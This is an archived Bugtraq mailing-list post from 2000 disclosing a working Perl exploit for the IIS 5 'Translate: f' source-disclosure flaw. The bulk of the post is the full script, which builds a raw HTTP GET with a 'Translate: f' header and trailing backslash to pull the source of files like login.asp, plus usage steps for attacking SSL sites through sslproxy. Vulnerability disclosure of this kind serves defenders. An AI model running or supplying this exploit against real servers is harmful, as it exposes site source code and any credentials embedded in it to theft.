Bugtraq mailing list archives
Translate:f [another PERL exploit]
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Fri, 18 Aug 2000 09:41:48 +0200
Below another PERL exloit: Does not require LWP::UserAgent. Will also work for virtually hosted sites. Can easily be used against SSL sites (with the use of sslproxy) Typical use: perl trans.pl www.the_iis5_box.com login.asp 80 For use against SSL sites: 1) sslproxy -L 127.0.0.1 -l 7555 -R IP_of_iis5_box -r 443 -v Class3.pem 2) perl trans.pl 127.0.0.1 login.asp 7555 Use at own risk/etc etc. Regards, Roelof. ---cut: trans.pl--- #!/usr/bin/perl use Socket; ####test arguments if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";} #####load values $host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1]; #####build request $xtosend=<<EOT GET /$toget\\ HTTP/1.0 Host: $host User-Agent: SensePostData Content-Type: application/x-www-form-urlencoded Translate: f EOT ; $xtosend=~s/\n/\r\n/g; ####send request #print $xtosend; my @results=sendraw($xtosend); print @results; #### Sendraw - thanx RFP rfp () wiretrip net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_; print STDOUT "." if(defined $args{X});} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } ---cut---- ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof () sensepost com +27 83 448 6996 http://www.sensepost.com
Current thread:
- Translate:f [another PERL exploit] Roelof Temmingh (Aug 18)